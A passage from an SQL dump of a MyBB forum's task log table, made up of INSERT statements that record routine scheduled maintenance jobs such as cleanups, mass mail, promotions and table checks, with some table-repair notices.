ran.'); INSERT INTO mybb_tasklog VALUES('13970', '7', '1351714944', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13971', '5', '1351714977', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13972', '9', '1351714993', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13973', '5', '1351715170', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13974', '9', '1351715844', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13975', '3', '1351715861', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13976', '9', '1351716125', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13977', '5', '1351717282', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13978', '9', '1351717463', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13979', '3', '1351717473', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13980', '1', '1351717480', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13981', '7', '1351717482', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13982', '5', '1351719661', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13983', '9', '1351720109', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13984', '3', '1351720118', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13985', '5', '1351720132', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13986', '9', '1351721680', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13987', '3', '1351721682', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13988', '1', '1351721689', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13989', '7', '1351721690', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13990', '5', '1351721694', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13991', '5', '1351723912', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13992', '9', '1351723960', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13993', '3', '1351723961', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13994', '9', '1351724238', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13995', '3', '1351724458', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13996', '1', '1351724489', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13997', '7', '1351724497', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13998', '5', '1351724777', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13999', '9', '1351725261', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14000', '5', '1351726756', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14001', '9', '1351726772', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14002', '3', '1351726774', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14003', '9', '1351726872', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14004', '5', '1351727758', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14005', '9', '1351727785', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14006', '3', '1351728050', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14007', '1', '1351728103', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14008', '2', '1351728126', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14009', '7', '1351728135', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14010', '5', '1351728307', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14011', '9', '1351731454', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14012', '5', '1351731604', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14013', '3', '1351731611', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14014', '1', '1351731623', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14015', '7', '1351731628', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14016', '5', '1351732173', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14017', '9', '1351732271', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14018', '5', '1351733291', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14019', '9', '1351733314', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14020', '3', '1351733697', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14021', '9', '1351734135', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14022', '5', '1351734338', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14023', '9', '1351735578', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14024', '3', '1351735581', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14025', '1', '1351735593', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14026', '7', '1351735600', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14027', '5', '1351735635', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14028', '9', '1351735821', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14029', '5', '1351736782', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14030', '9', '1351736795', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14031', '3', '1351737258', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14032', '9', '1351737626', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14033', '5', '1351738122', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14034', '9', '1351739575', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14035', '3', '1351739579', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14036', '1', '1351740233', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14037', '7', '1351740244', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14038', '5', '1351740248', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14039', '5', '1351740305', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14040', '9', '1351740400', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14041', '3', '1351740605', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14042', '9', '1351741211', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14043', '9', '1351741744', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14044', '9', '1351741752', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14045', '5', '1351741877', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14046', '9', '1351742729', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14047', '3', '1351742735', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14048', '1', '1351742802', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14049', '7', '1351742808', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14707', '5', '1351999761', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14708', '3', '1351999827', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14709', '9', '1352000513', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14710', '5', '1352000803', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14711', '9', '1352001453', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14712', '3', '1352002107', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14713', '1', '1352002158', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14714', '7', '1352002235', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14715', '5', '1352002295', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14716', '9', '1352005459', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14717', '5', '1352005562', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14718', '3', '1352005793', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14719', '1', '1352005799', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14720', '7', '1352005810', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14721', '9', '1352006089', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14722', '5', '1352006838', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14723', '9', '1352006848', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14724', '3', '1352007020', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14725', '9', '1352007720', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14726', '5', '1352007941', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14727', '9', '1352008696', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14728', '3', '1352008752', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14729', '1', '1352008981', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14730', '7', '1352009357', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14731', '5', '1352009387', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14732', '9', '1352009552', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14733', '5', '1352010334', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14734', '9', '1352010450', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14735', '3', '1352010614', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14736', '9', '1352011215', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14737', '5', '1352011564', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14738', '9', '1352012155', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14739', '3', '1352012373', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14740', '1', '1352012406', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14741', '7', '1352012426', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14742', '5', '1352012746', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14743', '9', '1352013035', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14744', '5', '1352014390', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14745', '9', '1352014391', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14746', '3', '1352014392', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14747', '9', '1352016317', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14748', '5', '1352017281', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14749', '3', '1352018010', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14750', '1', '1352018131', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14751', '7', '1352018460', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14752', '9', '1352018574', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14753', '5', '1352018649', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14754', '5', '1352018719', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14755', '9', '1352019359', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14756', '3', '1352020051', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14757', '1', '1352020062', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14758', '7', '1352020077', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14759', '5', '1352020159', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14760', '9', '1352020481', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14761', '5', '1352023230', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14762', '9', '1352023257', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14763', '3', '1352023962', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14764', '1', '1352023997', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14765', '7', '1352024033', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14766', '5', '1352025446', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14767', '9', '1352025526', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14768', '3', '1352025625', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14769', '9', '1352029947', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14770', '5', '1352030102', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14771', '3', '1352030109', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14772', '1', '1352030211', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14773', '7', '1352030227', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14774', '9', '1352030334', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14775', '3', '1352030350', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14776', '1', '1352030774', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14777', '4', '1352030782', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14778', '7', '1352030789', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14779', '5', '1352030799', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14780', '9', '1352031811', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14781', '5', '1352032332', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14782', '9', '1352032380', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14783', '3', '1352033028', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14784', '9', '1352033093', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14785', '5', '1352033287', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14786', '9', '1352033805', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14787', '3', '1352033944', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14788', '1', '1352034191', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14789', '7', '1352034210', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14790', '5', '1352034533', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14791', '9', '1352034606', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14792', '5', '1352035905', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14793', '9', '1352035912', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14794', '3', '1352035923', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14795', '9', '1352037377', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14796', '5', '1352037418', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14797', '3', '1352037807', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14798', '1', '1352037810', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14799', '7', '1352037815', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14800', '5', '1352037998', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14801', '9', '1352038295', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14802', '5', '1352039608', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14803', '9', '1352039638', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14804', '3', '1352039717', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14805', '9', '1352040485', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14806', '5', '1352040778', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14807', '9', '1352041138', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14808', '3', '1352041156', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14809', '1', '1352041330', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14810', '7', '1352041442', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14811', '5', '1352041526', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14812', '9', '1352041860', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14813', '5', '1352042921', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14814', '9', '1352043049', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14815', '3', '1352043372', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14816', '9', '1352043790', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14817', '5', '1352044228', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14818', '9', '1352044966', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14819', '3', '1352044968', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14820', '1', '1352044975', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14821', '7', '1352045684', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14822', '5', '1352046108', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14823', '9', '1352046173', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14824', '5', '1352046411', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14825', '9', '1352046550', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14826', '3', '1352046726', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14827', '9', '1352047329', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14828', '5', '1352047648', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14829', '9', '1352116008', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14830', '3', '1352116008', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14831', '1', '1352116017', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14832', '7', '1352117087', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14833', '5', '1352117092', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14834', '2', '1352117095', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14835', '11', '1352117106', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14836', '9', '1352117791', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14837', '3', '1352117795', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14838', '1', '1352117797', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14839', '5', '1352117800', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14840', '5', '1352118484', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14841', '9', '1352118497', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14842', '3', '1352120032', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14843', '9', '1352120064', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14844', '5', '1352120254', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14845', '9', '1352121781', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14846', '3', '1352121782', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14847', '1', '1352121783', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14848', '7', '1352121784', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14849', '5', '1352121785', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14850', '5', '1352122032', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14851', '9', '1352122057', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14852', '3', '1352123103', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14853', '9', '1352123447', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14854', '5', '1352123450', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14855', '9', '1352124337', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14856', '3', '1352125207', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14857', '1', '1352125265', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14858', '7', '1352125301', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14859', '5', '1352125322', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14860', '9', '1352125391', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14861', '5', '1352125790', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14862', '9', '1352125880', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14863', '3', '1352125935', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14864', '9', '1352127781', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14865', '5', '1352127958', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14866', '3', '1352128729', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14867', '1', '1352128734', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14868', '7', '1352128738', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14869', '9', '1352128738', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14870', '5', '1352129826', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14871', '9', '1352129988', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14872', '3', '1352129998', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14873', '9', '1352130001', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14874', '5', '1352130833', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14875', '9', '1352131159', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14876', '3', '1352131218', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14877', '1', '1352131492', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14878', '7', '1352131499', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14879', '5', '1352131512', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14880', '9', '1352132475', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14881', '5', '1352132814', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14882', '9', '1352132828', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14883', '3', '1352133424', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14884', '9', '1352133750', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14885', '5', '1352134095', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14886', '9', '1352135439', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14887', '3', '1352135725', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14888', '1', '1352135732', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14889', '7', '1352135739', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14890', '5', '1352136233', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14891', '5', '1352136311', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14892', '9', '1352136348', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14893', '3', '1352137868', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14894', '9', '1352138229', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14895', '5', '1352140038', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14896', '3', '1352140760', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14897', '1', '1352142608', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14898', '7', '1352142648', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14899', '9', '1352142663', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14900', '5', '1352142672', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14901', '3', '1352142688', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14902', '5', '1352143904', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14903', '9', '1352143915', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14904', '3', '1352143919', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14905', '9', '1352144533', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14906', '5', '1352144755', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14907', '9', '1352145766', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14908', '3', '1352145938', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14909', '1', '1352146591', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14910', '7', '1352146599', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14911', '5', '1352146609', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14912', '9', '1352146973', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14913', '5', '1352147335', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14914', '9', '1352149475', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14915', '3', '1352149894', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14916', '5', '1352149901', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14917', '1', '1352149908', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14918', '7', '1352149913', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14919', '9', '1352151088', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14920', '5', '1352151842', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14921', '3', '1352151952', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14922', '9', '1352151970', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14923', '5', '1352152027', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14924', '9', '1352154758', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14925', '3', '1352154776', 'The user cleanup task successfully ran.'); INSERT INTO 